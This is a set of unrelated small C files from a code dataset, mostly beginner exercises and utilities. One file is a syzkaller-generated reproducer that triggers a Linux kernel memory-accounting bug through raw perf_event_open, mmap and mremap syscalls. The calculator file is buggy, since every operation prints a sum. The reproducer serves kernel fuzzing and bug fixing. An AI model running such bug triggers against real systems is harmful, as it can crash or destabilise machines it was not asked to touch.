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the_stack_data/51700322.c
// 'and' etc. not keywords in C // originally found in package // In state 86, I expected one of these tokens: // <name>, auto, bool, char, const, double, extern, float, friend, inline, int, long, mutable, operator, register, short, signed, static, template, typedef, unsigned, virtual, void, volatile, wchar_t, (, ), [, ::, ~, &, *, >, ,, ;, __attribute__, restrict, // a.i:4:9: Parse error (state 86) at ! // ERR-MATCH: int main() { int not; int and; return 0; }
the_stack_data/107952994.c
#include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> //socket(), setsockopt(), bind(), listen(), accept(), send() #include <netinet/in.h> //sockaddr_in, #include <string.h> #include <unistd.h> //close() #include <signal.h> //signal() #include <arpa/inet.h> // struct sockaddr_in { // short sin_family; // unsigned short sin_port; // struct in_addr sin_addr; // char sin_zero[8]; // }; //Contiene la dirección IP del host // struct in_addr { // unsigned long s_addr; // }; void signal_callback_handler(int); // Define el codigo de los errores #define ERROR -1 // Define la longitud máxima para la cola de conexiones pendientes. #define BACKLOG 32 // Puerto en el que se va a hacer la comunicación #define PORT 8080 // Estructura que define el cliente y el servidor // http://es.tldp.org/Tutoriales/PROG-SOCKETS/prog-sockets.html struct sockaddr_in server; struct sockaddr_in client; // Trama es un paquete de datos que se envia a traves de la red // En este caso estas variables indican la longitud en bytes de la trama enviada socklen_t tramaServer; int err, // Guarda el Codigo del error fdSocket; // File Descriptor del Socket int main() { // int socket(int domain, int type, int protocol); // AF_INET: // IPv4 Protocolo de Internet // SOCK_STREAM: // proporciona flujos de bytes secuenciales, confiables, bidireccionales y basados en conexión. // Y el mecanismo de transmisión de datos fuera de banda puede ser compatible. fdSocket = socket(AF_INET, SOCK_STREAM, 0); if(fdSocket == ERROR) { perror("ERROR CLIENT: socket(...)\n"); exit(ERROR); } int option = 1; // int setsockopt(int sockfd, int level, int optname, const void *optval, socklen_t optlen); // sockfd: // Identificador del socket setsockopt(fdSocket, SOL_SOCKET, SO_REUSEADDR, &option, sizeof(option)); // Protocolo para la conexión server.sin_family = AF_INET; // Puerto para la conexión server.sin_port = htons(PORT); // Estructura a la dirección IP server.sin_addr.s_addr = inet_addr("127.0.0.1"); // Relleno bzero(server.sin_zero, 8); //int connect(int socket, struct sockaddr *address, int address_len); // socket: // identificador fd del socket que va a enlazar // socekt: // El puntero a una estructura de dirección de socket que contiene // la dirección del socket al que se intentará una conexión. // address_len: // El tamaño de la dirección de socket señalada por la dirección en bytes. tramaServer = sizeof(struct sockaddr); err = connect(fdSocket, (struct sockaddr *)&server, tramaServer); if(err == ERROR) { perror("ERROR CLIENT: connect(...)\n"); exit(ERROR); } //void (*signal(int sig, void (*func)(int)))(int); //sig: //Codigo SIG //func: //Funcion que se ejecuta signal(SIGINT, signal_callback_handler); //ssize_t recv(int sockfd, void *buf, size_t len, int flags); // sockfd: // identificador fd del socket que va a enlazar // buffer: // Apunta al buffer que contiene el mensaje a recibir. // length: // Especifica la longitud del mensaje (buffer) en bytes. // flags: // El parámetro flags se establece especificando uno o más de los siguientes flags. // Si se especifica más de una bandera, se debe usar el operador lógico OR (|) para separarlos. // El indicador MSG_CONNTERM se excluye mutuamente con otros indicadores. // MSG_CONNTERM, MSG_OOB, MSG_PEEK, MSG_WAITALL char * receiver = (char *) malloc(sizeof(char) * 120); err = recv(fdSocket, receiver, sizeof(char) * 120, 0); printf("Message : %s\n", receiver); char * message = (char *) malloc(sizeof(char) * 120); strcpy(message, "Luis Miguel"); send(fdSocket, message, sizeof(char) * 120, 0); // Liberar la memoria dinamica free(receiver); free(message); // close: //apaga un socket y libera los recursos asignados a ese socket. close(fdSocket); return 0; } void signal_callback_handler(int signum) { // Esta funcion se ejecuta si hay un Ctrl C printf("Callback client : %d", signum); close(fdSocket); // SIGNAL // Ctrl C == SIGINT // Ctrl \ == SIGQUIT // Ctrl Z == SIGTSTP }
the_stack_data/162643796.c
/* The MIT License Copyright (C) 2015 zz_zigzag <[email protected]> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #define PACKAGE_VERSION "0.1.1" static int usage() { fprintf(stderr, "\n"); fprintf(stderr, "Program: VCF_INDEL (format the <INDEL> vcf file)\n"); fprintf(stderr, "Version: %s\n", PACKAGE_VERSION); fprintf(stderr, "Contact: zz_zigzag <[email protected]>\n\n"); fprintf(stderr, "Usage: VCF_INDEL <in.vcf> <out.vcf>\n\n"); return 1; } int main(int argc, char* argv[]) { if(argc != 3) return usage(); struct stat fileStat; if(stat(argv[1], &fileStat) < 0) { fprintf(stderr, "[VCF_INDEL] Open %s failed.\n", argv[1]); return -1; } long fileSize = fileStat.st_size; FILE *fpin = fopen(argv[1], "r"); if(fpin == NULL) { fprintf(stderr, "[VCF_INDEL] Open %s failed.\n", argv[1]); return -1; } FILE *fpout = fopen(argv[2], "w"); if(fpout == NULL) { fprintf(stderr, "[VCF_INDEL] Open %s failed.\n", argv[2]); return -1; } char *buf = (char *)malloc(fileSize); if(fread(buf, fileSize, 1, fpin) != 1) { fprintf(stderr, "[VCF_INDEL] read %s failed.\n", argv[2]); return -1; } char *p = buf; char *t, *str, *str_line, *str_tab; t = str = str_line = str_tab = NULL; int brk1, len, len1, len2; brk1 = len = 0; char *chr, *ref; chr = ref = NULL; while((t = strtok_r(p, "\n", &str_line)) != NULL) { p = NULL; if(t[0] == '#') { //fprintf(fpout,"TYPE \"#\"\n"); continue; } t = strtok_r(t, "\t", &str_tab); chr = t; t = strtok_r(NULL, "\t", &str_tab); if(atoi(t) > brk1 && brk1+len >= atoi(t)) { continue; } brk1 = atoi(t); t = strtok_r(NULL, "\t", &str_tab); ref = strtok_r(NULL, "\t", &str_tab); len1 = strlen(ref); t = strtok_r(NULL, "\t", &str_tab); strtok_r(t, ",", &str); len2 = strlen(t); if(len2 != 1 && len1 != 1) continue; if(ref[0] != t[0]) continue; if(abs(len1 - len2) > 50) continue; len = len1>len2?len1:len2; fprintf(fpout, "%s\t%d\t%s\t%s\n", chr, brk1, ref, t); } fclose(fpin); fclose(fpout); return 0; }
the_stack_data/232955078.c
#include <assert.h> #include <stdbool.h> #include <stddef.h> #include <stdio.h> int main(const int argc, const char* const argv[]) { // Getting away with no error checking throughout because CodeEval makes some // strong guarantees about our runtime environment. No need to pay when we're // being benchmarked. Don't forget to define NDEBUG prior to submitting! assert(argc >= 2 && "Expecting at least one command-line argument."); static char stdoutBuffer[128] = ""; // Turn on full output buffering for stdout. setvbuf(stdout, stdoutBuffer, _IOFBF, sizeof stdoutBuffer); FILE* inputStream = fopen(argv[1], "r"); assert(inputStream && "Failed to open input stream."); // Pre-computed by the C++ version of this solution via -DGENERATE_LUT. static const unsigned terms[] = { 1, 2, 2, 4, 96, 1024, 2880, 81024, 770144 }; static const size_t termCount = (sizeof terms / sizeof *terms); for(size_t n = 0; fscanf(inputStream, "%zu", &n) == 1;) { assert(n <= (termCount * 2)); const bool isOdd = (!n || (n & 1)); const unsigned term = isOdd ? 0 : terms[(n / 2) - 1]; printf("%u\n", term); } // The CRT takes care of cleanup. }
the_stack_data/90762288.c
#include <stdio.h> int main() { printf("Hello, World"); return (0); }
the_stack_data/90763100.c
enum tag { X=1, Y=2, }; static void main(void) { enum tag foo; foo = Y; }
the_stack_data/103358.c
//Copyright (C) 2015 Corwin Hansen #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv[]){ if (argc == 4){//correct number of arguments FILE *source = fopen(argv[1], "rb");//open first argument to read as source FILE *dest = fopen(argv[2], "wb");//open second argument to write as destination FILE *key = fopen(argv[3], "rb");//open thard argument to read as key unsigned char buffk[1], buffs[2];//bufffers for key and source if (source == NULL || key == NULL){//if file could not be opend printf("Could not open one of the files\n Usage: %s <source> <destinatio> <key>", argv[0]);//print error and usage return 0;//exit } while (fread(buffk, 1, 1, key) != 0){//if not end of file of key fread(buffs, 1, 1, source);//read source buffs[0] ^= buffk[0];//get xor of both value fwrite(buffs, 1, 1, dest);//write to source } return 0;//exit } printf("Usage: %s <source> <destinatio> <key>", argv[0]);//print usage return 0;//exit }
the_stack_data/45865.c
/* Name: p4-04.c Purpose: Calculates entered number in decimal to octal. Author: NiceMan1337 Date: 16.03.2022 */ #include <stdio.h> int main(void) { /*declare variable*/ int number, n1, n2, n3, n4, n5; /*ask user for input*/ printf("Enter a number between 0 and 32767: "); scanf("%5d", &number); /*calculate number in octal*/ n1 = number % 8; n2 = (number / 8) % 8; n3 = (number / 64) % 8; n4 = (number / 512) % 8; n5 = (number / 4096) % 8; /*print out the result*/ printf("In octal, your number is: %d%d%d%d%d\n", n5, n4, n3, n2, n1); return 0; } /*Description: You could just calculate everything in printf without using all n values*/
the_stack_data/231394148.c
/* csv2txt * * Transforms CSV input into lines with fields delimited by * a single field separator (TAB by default). * * Usage: csv2txt < input.csv > output.txt {FS} */ #include <stdlib.h> #include <stdio.h> #define select switch #define when break; case #define also case #define otherwise break; default enum { START=1, QUOTED=2, PLAIN=3, CLOSING=4 }; static void die(const char *msg, int state, int nr, int nf, int nl, int nc) { const char* fmt="\ncsv2txt: %s (state: %d; record: %d; field: %d; line: %d; character: %d)\n"; fflush(stdout); fprintf(stderr, fmt, msg, state, nr, nf, nl, nc); exit(EXIT_FAILURE); } static char buffer1[BUFSIZ], buffer2[BUFSIZ]; int main(int argc, char *argv[]) { const char RS='\n'; /* output record separator */ char FS='\t'; /* output field separator */ int nr=1, nf=1, nl=1, nc=0; /* number of records, fields, lines, chars */ register int c, state; if (argc > 1) { /* user defined field separator */ FS=argv[1][0]; } setbuf(stdin, buffer1); setbuf(stdout, buffer2); # define get(c) (((c)=getc(stdin)) != EOF) # define put(c) putc((c), stdout) # define error(msg) die(msg,state,nr,nf,nl,nc) # define next_field do { put(FS); ++nf; state=START; } while (0) # define next_record do { put(RS); nf=1; ++nr; state=START; } while (0) state=START; while (get(c)) { ++nc; if (c == '\r') { continue; /* ignore CR */ } if (c == FS) { error("output field separator found in input data"); } select (state) { when START: select(c) { when ',': put('0'); next_field; /* empty fields assumed = zero */ when '\n': ++nl; put('0'); next_record; when '"': state=QUOTED; otherwise: state=PLAIN; put(c); } when PLAIN: select(c) { when ',': next_field; when '\n': ++nl; next_record; otherwise: put(c); } when QUOTED: select(c) { when '\n': ++nl; put(c); when '"': state=CLOSING; otherwise: put(c); } when CLOSING: select(c) { when ',': next_field; when '\n': ++nl; next_record; when '"': state=QUOTED; put(c); /* "" */ otherwise: error("unexpected double quote"); } otherwise: error("internal error (unexpected state)"); } } select (state) { when START: /*nop*/ when PLAIN: put(RS); when CLOSING: put(RS); when QUOTED: error("unexpected end of quoted field"); } return EXIT_SUCCESS; } /* * vim:ts=4:sw=4:ai:et */
the_stack_data/1052432.c
#include<stdio.h> int main() { if(printf("RAKESH YADAV")) { } }
the_stack_data/819392.c
/* * Objectives * ---------- * 1) Convert user input from inches to centimetres * * Design * ------ * 1) Take input from user (number of inches) * 2) Process the input using the formula 1 inch = 2.54 cm * Provide the centimetre output to the user */
the_stack_data/198581676.c
#include <unistd.h> #include <fcntl.h> #include "syscall.h" int rmdir(const char *path) { #ifdef SYS_rmdir return syscall(SYS_rmdir, path); #else return syscall(SYS_unlinkat, AT_FDCWD, path, AT_REMOVEDIR); #endif }
the_stack_data/22231.c
/*Daala video codec Copyright (c) 2012 Daala project contributors. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: - Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. - Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.*/ #ifdef HAVE_CONFIG_H #include "config.h" #endif #include <math.h> #include <stdlib.h> #include <stdio.h> #define MAXN 32768 int main(int argc, char **argv) { int i; int N; int shift; int j; float p[16]; int pi[16]; int sum; int aN[MAXN]; if (argc!=3) fprintf(stderr, "bad bad bad\n"); N=atoi(argv[1]); shift=atoi(argv[2]); printf("/* This file is auto-generated using \"gen_cdf %d %d\" */\n\n", N, shift); printf("#include \"pvq_code.h\"\n\n"); printf("const ogg_uint16_t cdf_table[%d][16] = {\n", N+1); printf(" {"); for(j=0;j<16;j++){ printf("%5d%s",32768U-15+j,j+1<16?",":""); } printf("},\n"); aN[0]=1; for (i=1;i<=N;i++){ float Ex; float gamma; float a; int cdf; float maxp; int maxj; Ex=(float)i/(1<<shift); gamma = (sqrt(1+4*Ex*Ex)-1)/(2*Ex); a=-.5/log(gamma); aN[i] = floor(.5+256*exp(-1./a)); /*printf("%f %f ", Ex, a);*/ p[0]=1-exp(-.5/a); for(j=1;j<15;j++) p[j]=exp(-.5/a)*(exp(-((float)j-1.)/a)-exp(-(float)j/a)); p[15]=exp(-.5/a)*exp(-14./a); sum=0; maxp=0; maxj=0; for(j=0;j<16;j++) { if (p[j]>maxp) { maxp=p[j]; maxj=j; } pi[j] = floor(.5+32768*p[j]); if (pi[j]==0) pi[j]=1; sum += pi[j]; } pi[maxj] += 32768-sum; cdf = 0; printf(" {"); for(j=0;j<16;j++) { cdf += pi[j]; printf("%5d%s", cdf, j+1<16?",":""); } printf("}%s\n",i+1<=N?",":""); /*printf("\n");*/ } printf("};\n"); printf("\n\n"); printf("const unsigned char decayE[%d] = {\n", N+1); for(i=0;i<=N;i++) printf(" %d%s\n", aN[i], i+1<=N?",":""); printf("};\n"); return 0; }
the_stack_data/182953785.c
/* Given a sorted array of non-repeated integers A[1...n], n > 1 then check whether there is an index i for which A[i] = i. Give an algorithm that runs in O(logn) time */ #include <stdio.h> int BS(int a[], int l, int h){ if(h >= l){ int mid = (l + h)/2; if(a[mid] == mid){ return mid; } if(a[mid] < mid){ return BS(a, mid + 1, h); } if(a[mid] > mid){ return BS(a, l, mid - 1); } } return -1; } int main(){ int a[10] = {-2, -1, 0, 1, 2, 4, 5, 7, 11, 13}; int n = sizeof(a)/sizeof(a[0]); int result = BS(a, 0, n-1); if(result != -1){ printf("A[i] = i at Point: %d", result); } else{ printf("There is not element satisfying A[i] = i"); } return 0; }
the_stack_data/134544.c
#ifdef _WIN32 /* too long bitfield */ int main (void) { return 68; } #else int printf (const char *, ...); struct A { long a : 40; } a1 = {187134098732}; static int test_a (void) { long l = a1.a; return printf ("%ld\n", l); } struct B { struct A a; short b : 4; } b1 = {3, -2}; static int test_b (void) { int foo = b1.b; return printf ("%ld, %d\n", (long) b1.a.a, foo); } struct C { short a : 3; char b : 5; char c : 3; } c1 = {3}; static int test_c (void) { return printf ("{%d, %d, %d}\n", c1.a, c1.b, c1.c); } struct D { unsigned long a : 32; unsigned long : 4; unsigned long b : 20; } d1 = {-1, -1}, d2 = {0, 1241}, d3 = {0}; static int test_d (struct D d) { return printf ("{%u, %u}\n", d.a, d.b); } int main (void) { printf ("sizeof(struct A) = %lu\n", sizeof (struct A)); printf ("sizeof(struct B) = %lu\n", sizeof (struct B)); printf ("sizeof(struct C) = %lu\n", sizeof (struct C)); return test_a () + test_b () + test_c () + test_d (d1) + test_d (d2) + test_d (d3); }; #endif
the_stack_data/113202.c
/* ************************************************************************** */ /* LE - / */ /* / */ /* test2.c .:: .:/ . .:: */ /* +:+:+ +: +: +:+:+ */ /* By: clcreuso <[email protected]> +:+ +: +: +:+ */ /* #+# #+ #+ #+# */ /* Created: 2019/08/08 16:24:38 by clcreuso #+# ## ## #+# */ /* Updated: 2019/08/08 16:25:05 by clcreuso ### #+. /#+ ###.fr */ /* / */ /* / */ /* ************************************************************************** */ #include <stdlib.h> int main(void) { char *addr; int i; i = 0; while (i < 1024) { addr = (char*)malloc(1024); addr[0] = 42; free(addr); i++; } return (0); }
the_stack_data/200142593.c
#include <stdio.h> main(){ printf("выкуси гаденыш ъаъаъ"); }
the_stack_data/176707012.c
/********************************************************************** # Love, Copyright (c) 2009 Bob Aman # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. **********************************************************************/ #include <stdlib.h> #include <stdio.h> #include "error.h" static void usage(const char *name) { /* This message really ought to be max 23 lines. * Removed -h because the user already knows that option. Others? */ static const char *const usage_msg[] = { "-c check syntax only", "-d set debugging flags (set DEBUG to true)", "-e 'command' executes a single line command", "-w turn warnings on for your script", "-W[level] set warning level (0=silence, 1=medium, 2=verbose)", "--copyright print the copyright", "--version print the version", NULL }; const char *const *p = usage_msg; printf("Usage: %s [switches] [--] [programfile] [arguments]\n", name); while (*p) { printf(" %s\n", *p++); } }
the_stack_data/18888323.c
#if defined _WIN32 #include<windows.h> #else #include<pthread.h> #endif void *f(void) { #if defined _WIN32 return CreateThread; #else return pthread_create; #endif }
the_stack_data/136817.c
// BUG: Bad rss-counter state // https://syzkaller.appspot.com/bug?id=11fad2b9698fd0f05ce9 // status:0 // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <dirent.h> #include <endian.h> #include <errno.h> #include <fcntl.h> #include <signal.h> #include <stdarg.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/prctl.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> static void sleep_ms(uint64_t ms) { usleep(ms * 1000); } static uint64_t current_time_ms(void) { struct timespec ts; if (clock_gettime(CLOCK_MONOTONIC, &ts)) exit(1); return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000; } #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) static bool write_file(const char* file, const char* what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) return false; if (write(fd, buf, len) != len) { int err = errno; close(fd); errno = err; return false; } close(fd); return true; } static void kill_and_wait(int pid, int* status) { kill(-pid, SIGKILL); kill(pid, SIGKILL); int i; for (i = 0; i < 100; i++) { if (waitpid(-1, status, WNOHANG | __WALL) == pid) return; usleep(1000); } DIR* dir = opendir("/sys/fs/fuse/connections"); if (dir) { for (;;) { struct dirent* ent = readdir(dir); if (!ent) break; if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0) continue; char abort[300]; snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name); int fd = open(abort, O_WRONLY); if (fd == -1) { continue; } if (write(fd, abort, 1) < 0) { } close(fd); } closedir(dir); } else { } while (waitpid(-1, status, __WALL) != pid) { } } static void setup_test() { prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); setpgrp(); write_file("/proc/self/oom_score_adj", "1000"); } static void execute_one(void); #define WAIT_FLAGS __WALL static void loop(void) { int iter; for (iter = 0;; iter++) { int pid = fork(); if (pid < 0) exit(1); if (pid == 0) { setup_test(); execute_one(); exit(0); } int status = 0; uint64_t start = current_time_ms(); for (;;) { if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid) break; sleep_ms(1); if (current_time_ms() - start < 5 * 1000) continue; kill_and_wait(pid, &status); break; } } } uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; void execute_one(void) { intptr_t res = 0; memcpy((void*)0x2000fffa, "./bus\000", 6); res = syscall(__NR_open, 0x2000fffaul, 0x141042ul, 0ul); if (res != -1) r[0] = res; memcpy((void*)0x20000000, "./bus\000", 6); res = syscall(__NR_open, 0x20000000ul, 0x141042ul, 0ul); if (res != -1) r[1] = res; syscall(__NR_write, r[1], 0x20000580ul, 0x17ul); *(uint32_t*)0x20000180 = 6; *(uint32_t*)0x20000184 = 0x70; *(uint8_t*)0x20000188 = 0; *(uint8_t*)0x20000189 = 0; *(uint8_t*)0x2000018a = 0; *(uint8_t*)0x2000018b = 0; *(uint32_t*)0x2000018c = 0; *(uint64_t*)0x20000190 = 0; *(uint64_t*)0x20000198 = 0; *(uint64_t*)0x200001a0 = 0; STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 0, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 1, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 2, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 3, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 4, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 5, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 6, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 7, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 8, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 9, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 10, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 11, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 12, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 13, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 14, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 15, 2); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 17, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 18, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 19, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 20, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 21, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 22, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 23, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 24, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 25, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 26, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 27, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 28, 1); STORE_BY_BITMASK(uint64_t, , 0x200001a8, 0, 29, 35); *(uint32_t*)0x200001b0 = 0; *(uint32_t*)0x200001b4 = 0; *(uint64_t*)0x200001b8 = 0x20000000; *(uint64_t*)0x200001c0 = 0; *(uint64_t*)0x200001c8 = 0; *(uint64_t*)0x200001d0 = 0; *(uint32_t*)0x200001d8 = 0; *(uint32_t*)0x200001dc = 0; *(uint64_t*)0x200001e0 = 0; *(uint32_t*)0x200001e8 = 0; *(uint16_t*)0x200001ec = 0; *(uint16_t*)0x200001ee = 0; syscall(__NR_perf_event_open, 0x20000180ul, 0, 0ul, -1, 0ul); syscall(__NR_mmap, 0x2000a000ul, 0x4000ul, 0ul, 0x12ul, r[0], 0ul); syscall(__NR_mremap, 0x2000a000ul, 0x1000ul, 0x2000ul, 3ul, 0x20005000ul); syscall(__NR_mremap, 0x20005000ul, 0x1000ul, 0x1000ul, 3ul, 0x2000a000ul); } int main(void) { syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul); syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul); syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul); loop(); return 0; }
the_stack_data/170454389.c
#include<stdio.h> main() { int l,b,area; printf("Enter the length and breadth of the rectangle\n"); scanf("%d%d",&l,&b); area=l*b; printf("Area of the rectangle is %d",area); }
the_stack_data/943174.c
#include <stdio.h> void add(double a,double b){ printf("%.1lf + %.1lf = %.1lf", a, b, a + b); } void sub(double a,double b){ printf("%.1lf + %.1lf = %.1lf", a, b, a + b); } void mul(double a,double b){ printf("%.1lf + %.1lf = %.1lf", a, b, a + b); } void div(double a,double b){ printf("%.1lf + %.1lf = %.1lf", a, b, a + b); } int main() { char ch; double a, b; void (*add_ptr)(double,double)=&add; void (*sub_ptr)(double,double)=&sub; void (*mul_ptr)(double,double)=&mul; void (*div_ptr)(double,double)=&div; printf("Enter operator (+, -, *, /): "); scanf("%c", &ch); printf("Enter a and b: "); scanf("%lf %lf", &a, &b); switch (ch) { case '+': (*add_ptr)(a,b); break; case '-': (*sub_ptr)(a,b); break; case '*': (*mul_ptr)(a,b); break; case '/': (*div_ptr)(a,b); break; default: printf("Operator is not correct"); } return 0; }
the_stack_data/20449250.c
/* -*- Mode: C; tab-width: 4; indent-tabs-mode: nil; c-basic-offset: 4 -*- */ /* Duda I/O * -------- * Copyright (C) 2012-2014, Eduardo Silva P. <[email protected]> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <ctype.h> #include <limits.h> int duda_utils_strtol(const char *nptr, int len, long *result) { /* * Part of the following code was taken from the following links: * * - http://opensource.apple.com/source/xnu/xnu-1456.1.26/bsd/libkern/strtol.c * - http://www.koders.com/c/fid0A9B008CA98BE77AEC5E59AFC19BECAE325AC60F.aspx * - http://www.ethernut.de/api/strtol_8c_source.html * * It has been modified in order to accept the string length and store the result * in the 'result' parameter. */ /* * Compute the cutoff value between legal numbers and illegal * numbers. That is the largest legal value, divided by the * base. An input number that is greater than this value, if * followed by a legal input character, is too big. One that * is equal to this value may be valid or not; the limit * between valid and invalid numbers is then based on the last * digit. For instance, if the range for longs is * [-2147483648..2147483647] and the input base is 10, * cutoff will be set to 214748364 and cutlim to either * 7 (neg==0) or 8 (neg==1), meaning that if we have accumulated * a value > 214748364, or equal but the next digit is > 7 (or 8), * the number is too big, and we will return a range error. * * Set any if any `digits' consumed; make it negative to indicate * overflow. */ const char *s = nptr; unsigned long acc; int c; unsigned long cutoff; int neg = 0, any, cutlim; int base = 10; c = *s++; if (c == '-') { neg = 1; c = *s++; } else if (c == '+') { c = *s++; } cutoff = neg ? - (unsigned long) LONG_MIN : LONG_MAX; cutlim = cutoff % (unsigned long) base; cutoff /= (unsigned long) base; for (acc = 0, any = 0; (s - ((const char *) nptr) <= len ); c = *s++) { if (isdigit(c)) { c -= '0'; } else { any = -1; break; } if (c >= base) { any = -1; break; } if (any < 0 || acc > cutoff || (acc == cutoff && c > cutlim)) { any = -1; } else { any = 1; acc *= base; acc += c; } } if (any < 0) { *result = 0; return -1; } else if (neg) { acc = -acc; } *result = acc; return 0; }
the_stack_data/230734.c
void insertion_sort(int list[], int n) { int temp; int j; for (int i = 0; i < n; i++) { temp = list[i]; for (j = i - 1; j >= 0 && temp < list[j]; j--) //매번 자신의 알맞은 위치를 탐색하여 삽입 { list[j + 1] = list[j]; } list[j + 1] = temp; } }
the_stack_data/676218.c
#include<stdio.h> void selectionSort(int arr[], int arrSize) { int i, j, k; // Algorithm for sorting. for (i = 0; i <= arrSize - 2; i++) for (j = i + 1; j <= arrSize - 1; j++) if (arr[i] > arr[j]) { int temp = arr[i]; arr[i] = arr[j]; arr[j] = temp; } //End of algorithm. } /* int main() { int arr[' '],arrSize,i; printf("Enter size of the array :: "); scanf("%d",&arrSize); printf("\nEnter elements of the array ::\n"); for(i=0; i<arrSize; i++) scanf("%d",&arr[i]); selectionSort(arr,arrSize); printf("\nSorted array ::"); for(i=0; i<arrSize; i++) printf(" %d",arr[i]); return 0; } */
the_stack_data/18968.c
